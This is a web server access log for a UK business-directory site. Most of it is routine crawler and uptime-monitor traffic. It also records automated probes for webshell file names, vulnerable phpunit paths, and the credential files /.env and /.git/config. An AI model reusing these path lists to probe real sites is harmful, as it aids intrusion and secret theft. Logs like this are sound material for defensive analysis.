68.218.88.48 - - [27/Jul/2025:14:04:26 +0000] "GET /dropdown.php?p= HTTP/1.1" 301 248 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:27 +0000] "GET /radio.php HTTP/1.1" 301 242 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:27 +0000] "GET /moon.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:28 +0000] "GET /img/wp-login.php HTTP/1.1" 301 249 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:28 +0000] "GET /wp-admin/maint/maint.php HTTP/1.1" 301 257 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:29 +0000] "GET /mah.php?p= HTTP/1.1" 301 243 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:30 +0000] "GET /images/anjay.php HTTP/1.1" 301 249 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:30 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/small.php HTTP/1.1" 301 278 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:31 +0000] "GET /webadmin.php HTTP/1.1" 301 245 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:32 +0000] "GET /core.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:32 +0000] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 275 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:33 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/astab.php HTTP/1.1" 301 278 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:34 +0000] "GET /astab.php HTTP/1.1" 301 242 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:34 +0000] "GET /makeasmtp.php?p= HTTP/1.1" 301 249 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:35 +0000] "GET /abe.php HTTP/1.1" 301 240 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:35 +0000] "GET /cgi-bin/index.php HTTP/1.1" 301 250 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:36 +0000] "GET /packed.php HTTP/1.1" 301 243 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:36 +0000] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 267 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:37 +0000] "GET /about/function.php HTTP/1.1" 301 251 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:38 +0000] "GET /index/admin.php HTTP/1.1" 301 248 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:38 +0000] "GET /wp-admin/css/colors/blue/admin.php HTTP/1.1" 301 267 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:39 +0000] "GET /wp-includes/fonts/index.php HTTP/1.1" 301 260 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:40 +0000] "GET /wp-admin/images/about.php HTTP/1.1" 301 258 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:41 +0000] "GET /simple.php HTTP/1.1" 301 243 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:41 +0000] "GET /index/function.php HTTP/1.1" 301 251 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:42 +0000] "GET /item.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:43 +0000] "GET /classwithtostring.php HTTP/1.1" 301 254 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:43 +0000] "GET /cgi-bin/xmrlpc.php?p= HTTP/1.1" 301 254 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:44 +0000] "GET /wp-admin/includes/index.php HTTP/1.1" 301 260 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:44 +0000] "GET /readme.php HTTP/1.1" 301 243 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:45 +0000] "GET /wp-content/uploads/index.php HTTP/1.1" 301 261 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:46 +0000] "GET /wp-admin/images/index.php HTTP/1.1" 301 258 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:46 +0000] "GET /filemanager.php HTTP/1.1" 301 248 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:47 +0000] "GET /shell20211028.php HTTP/1.1" 301 250 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:48 +0000] "GET /.well-known/index.php HTTP/1.1" 301 254 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:48 +0000] "GET /info.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:49 +0000] "GET /file.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:49 +0000] "GET /wp-mail.php HTTP/1.1" 301 244 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:50 +0000] "GET /defaults.php HTTP/1.1" 301 245 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:50 +0000] "GET /about.php HTTP/1.1" 301 242 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:51 +0000] "GET /wp-content/uploads/autoload_classmap.php HTTP/1.1" 301 273 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:51 +0000] "GET /wp-admin/404.php HTTP/1.1" 301 249 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:52 +0000] "GET /db.php HTTP/1.1" 301 239 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:53 +0000] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 269 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:54 +0000] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 270 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:54 +0000] "GET /cong.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:55 +0000] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 262 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:56 +0000] "GET /install.php HTTP/1.1" 301 244 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:56 +0000] "GET /wp-content/themes/ HTTP/1.1" 301 251 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:57 +0000] "GET /wp-content/themes/index.php HTTP/1.1" 301 260 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:58 +0000] "GET /.well-known/pki-validation/about.php HTTP/1.1" 302 217 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:58 +0000] "GET /mah.php HTTP/1.1" 301 240 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:59 +0000] "GET /alfa.php HTTP/1.1" 301 241 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:04:59 +0000] "GET /wp-admin/js/index.php HTTP/1.1" 301 254 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:00 +0000] "GET /wp-admin/index.php HTTP/1.1" 301 251 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:01 +0000] "GET /randkeyword.php HTTP/1.1" 301 248 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:01 +0000] "GET /wp-content/about.php HTTP/1.1" 301 253 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:02 +0000] "GET /buy.php HTTP/1.1" 301 240 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:03 +0000] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 301 263 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:03 +0000] "GET /wp-content/file.php HTTP/1.1" 301 252 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:04 +0000] "GET /autoload_classmap.php HTTP/1.1" 301 254 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:05 +0000] "GET /wp-admin/user/index.php HTTP/1.1" 301 256 "-" "-"
68.218.88.48 - - [27/Jul/2025:14:05:05 +0000] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 301 276 "-" "-"
216.144.248.26 - - [27/Jul/2025:14:06:45 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
98.81.247.17 - - [27/Jul/2025:14:09:33 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
216.144.248.29 - - [27/Jul/2025:14:11:49 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
3.92.88.26 - - [27/Jul/2025:14:12:46 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
3.92.88.26 - - [27/Jul/2025:14:12:46 +0000] "GET /favicon.ico HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0"
3.92.88.26 - - [27/Jul/2025:14:12:47 +0000] "GET /favicon.ico HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0"
85.208.96.202 - - [27/Jul/2025:14:14:22 +0000] "GET /pages/48374-billericay-door-and-window-repairs.html HTTP/1.1" 301 288 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.144.248.24 - - [27/Jul/2025:14:16:52 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
204.76.203.219 - - [27/Jul/2025:14:17:33 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.244.66.197 - - [27/Jul/2025:14:20:53 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.197 - - [27/Jul/2025:14:20:55 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.144.248.29 - - [27/Jul/2025:14:21:56 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.203.36.155 - - [27/Jul/2025:14:23:04 +0000] "GET /support/ HTTP/1.0" 301 241 "http://yellowleaf.co.uk/support/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
69.162.124.227 - - [27/Jul/2025:14:27:00 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
167.94.138.49 - - [27/Jul/2025:14:29:45 +0000] "GET / HTTP/1.1" 301 238 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.49 - - [27/Jul/2025:14:29:51 +0000] "PRI * HTTP/2.0" 403 - "-" "-"
167.94.138.49 - - [27/Jul/2025:14:30:04 +0000] "GET /favicon.ico HTTP/1.1" 301 249 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.49 - - [27/Jul/2025:14:30:11 +0000] "PRI * HTTP/2.0" 403 - "-" "-"
167.94.138.49 - - [27/Jul/2025:14:30:33 +0000] "\x16\x03\x01\x01\x0c\x01" 403 - "-" "-"
167.94.138.49 - - [27/Jul/2025:14:30:37 +0000] "GET /sitemap.xml HTTP/1.1" 301 249 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
85.208.98.23 - - [27/Jul/2025:14:30:58 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:14:30:58 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
64.62.156.80 - - [27/Jul/2025:14:31:31 +0000] "\x16\x03\x01" 403 - "-" "-"
216.144.248.26 - - [27/Jul/2025:14:32:06 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
91.224.92.17 - - [27/Jul/2025:14:35:15 +0000] "GET / HTTP/1.1" 301 233 "-" "-"
216.144.248.25 - - [27/Jul/2025:14:37:10 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
69.162.124.227 - - [27/Jul/2025:14:42:16 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.96.199 - - [27/Jul/2025:14:46:33 +0000] "GET /business/wrexham.html HTTP/1.1" 301 254 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.90 - - [27/Jul/2025:14:46:47 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.90 - - [27/Jul/2025:14:47:11 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.144.248.25 - - [27/Jul/2025:14:47:18 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.27 - - [27/Jul/2025:14:52:23 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
146.70.193.102 - - [27/Jul/2025:14:53:36 +0000] "GET /.git/config HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; Scanner/1.0)"
167.94.138.164 - - [27/Jul/2025:14:54:34 +0000] "GET / HTTP/1.1" 301 238 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.164 - - [27/Jul/2025:14:54:42 +0000] "PRI * HTTP/2.0" 403 - "-" "-"
167.94.138.164 - - [27/Jul/2025:14:55:04 +0000] "GET /favicon.ico HTTP/1.1" 301 249 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.164 - - [27/Jul/2025:14:55:15 +0000] "PRI * HTTP/2.0" 403 - "-" "-"
167.94.138.164 - - [27/Jul/2025:14:55:27 +0000] "\x16\x03\x01\x01\x0c\x01" 403 - "-" "-"
167.94.138.164 - - [27/Jul/2025:14:55:31 +0000] "GET /robots.txt HTTP/1.1" 301 248 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
51.68.111.217 - - [27/Jul/2025:14:55:39 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.217 - - [27/Jul/2025:14:55:39 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
69.162.124.238 - - [27/Jul/2025:14:57:29 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.21 - - [27/Jul/2025:15:02:33 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.18 - - [27/Jul/2025:15:05:37 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot; +http://www.semrush.com/bot.html)"
216.244.66.197 - - [27/Jul/2025:15:06:10 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.197 - - [27/Jul/2025:15:06:10 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
69.162.124.238 - - [27/Jul/2025:15:07:37 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.84.137 - - [27/Jul/2025:15:10:04 +0000] "GET /img/email_head.png HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
66.249.84.136 - - [27/Jul/2025:15:10:04 +0000] "GET /img/logo_lil2.png HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
54.36.149.17 - - [27/Jul/2025:15:12:00 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
69.162.124.235 - - [27/Jul/2025:15:12:40 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.73.216.90 - - [27/Jul/2025:15:13:25 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.144.248.18 - - [27/Jul/2025:15:17:44 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
79.142.79.56 - - [27/Jul/2025:15:20:17 +0000] "GET /pages/41675-stl-communications-ltd.html HTTP/1.1" 301 276 "http://www.yellowleaf.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131"
78.153.140.93 - - [27/Jul/2025:15:20:33 +0000] "GET /.env HTTP/1.1" 301 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.93 - - [27/Jul/2025:15:20:33 +0000] "POST / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
43.166.226.186 - - [27/Jul/2025:15:21:39 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.144.248.21 - - [27/Jul/2025:15:22:47 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
69.162.124.227 - - [27/Jul/2025:15:27:51 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.18 - - [27/Jul/2025:15:29:04 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot; +http://www.semrush.com/bot.html)"
20.163.32.0 - - [27/Jul/2025:15:32:19 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 301 264 "-" "Mozilla/5.0 zgrab/0.x"
69.162.124.227 - - [27/Jul/2025:15:32:56 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.27 - - [27/Jul/2025:15:38:02 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.23 - - [27/Jul/2025:15:43:07 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
142.202.255.145 - - [27/Jul/2025:15:43:26 +0000] "GET /pages/37735-wedding-entertainment--entertainers-worldwide.html HTTP/1.1" 301 299 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.73.216.90 - - [27/Jul/2025:15:48:04 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.162.124.227 - - [27/Jul/2025:15:48:13 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.73.216.90 - - [27/Jul/2025:15:48:37 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.244.66.197 - - [27/Jul/2025:15:52:05 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
139.59.1.9 - - [27/Jul/2025:15:53:05 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
139.59.1.9 - - [27/Jul/2025:15:53:05 +0000] "GET /favicon.ico HTTP/1.1" 301 241 "http://51.89.169.208/" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
216.144.248.30 - - [27/Jul/2025:15:53:18 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
40.88.21.235 - - [27/Jul/2025:15:54:54 +0000] "GET / HTTP/1.1" 301 237 "http://www.yellowleaf.co.uk/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
69.162.124.238 - - [27/Jul/2025:15:58:22 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.19 - - [27/Jul/2025:16:03:28 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.73.216.90 - - [27/Jul/2025:16:05:25 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.203.36.153 - - [27/Jul/2025:16:07:21 +0000] "GET /support/ HTTP/1.0" 301 241 "http://yellowleaf.co.uk/support/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.245.221.83 - - [27/Jul/2025:16:08:33 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
20.65.194.164 - - [27/Jul/2025:16:09:50 +0000] "GET /manager/text/list HTTP/1.1" 301 247 "-" "Mozilla/5.0 zgrab/0.x"
69.162.124.235 - - [27/Jul/2025:16:13:37 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.220.149.10 - - [27/Jul/2025:16:14:22 +0000] "GET /pages/16286-hackney-london-calor-gas-stockist.html HTTP/1.1" 301 287 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
216.144.248.21 - - [27/Jul/2025:16:18:40 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
78.153.140.93 - - [27/Jul/2025:16:23:01 +0000] "GET /.env HTTP/1.1" 301 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.93 - - [27/Jul/2025:16:23:01 +0000] "POST / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
216.144.248.21 - - [27/Jul/2025:16:23:44 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
193.46.255.153 - - [27/Jul/2025:16:24:25 +0000] "GET / HTTP/1.1" 301 233 "-" "-"
216.144.248.28 - - [27/Jul/2025:16:28:47 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
173.252.107.4 - - [27/Jul/2025:16:32:34 +0000] "GET /stevehowedrivingschool HTTP/1.1" 301 259 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
173.252.107.5 - - [27/Jul/2025:16:32:34 +0000] "GET /stevehowedrivingschool HTTP/1.1" 301 259 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
216.144.248.19 - - [27/Jul/2025:16:33:51 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
149.86.227.127 - - [27/Jul/2025:16:33:58 +0000] "GET /boaform/form_loid_burning HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
69.171.251.115 - - [27/Jul/2025:16:35:08 +0000] "GET /stevehowedrivingschool?fbclid=IwZXh0bgNhZW0CMTEAAR5YB9KUhbHERi0631HGNTTstF6h0CmGIC8wRNFaFXyoS1K6J1WGV-ynwWKE8Q_aem_tw0nxn659Ow6DlJCTH5-eg HTTP/1.1" 301 374 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0"
173.252.79.112 - - [27/Jul/2025:16:36:08 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
46.105.42.135 - - [27/Jul/2025:16:37:02 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
46.105.42.135 - - [27/Jul/2025:16:37:02 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
121.37.102.143 - - [27/Jul/2025:16:37:12 +0000] "GET /members/uploads/1/2006_1.jpg HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
85.208.98.23 - - [27/Jul/2025:16:37:40 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.31 - - [27/Jul/2025:16:37:54 +0000] "GET /pages/1132-car-accessories-plus.html HTTP/1.1" 301 273 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.244.66.197 - - [27/Jul/2025:16:38:48 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.144.248.28 - - [27/Jul/2025:16:38:56 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
216.144.248.25 - - [27/Jul/2025:16:44:02 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
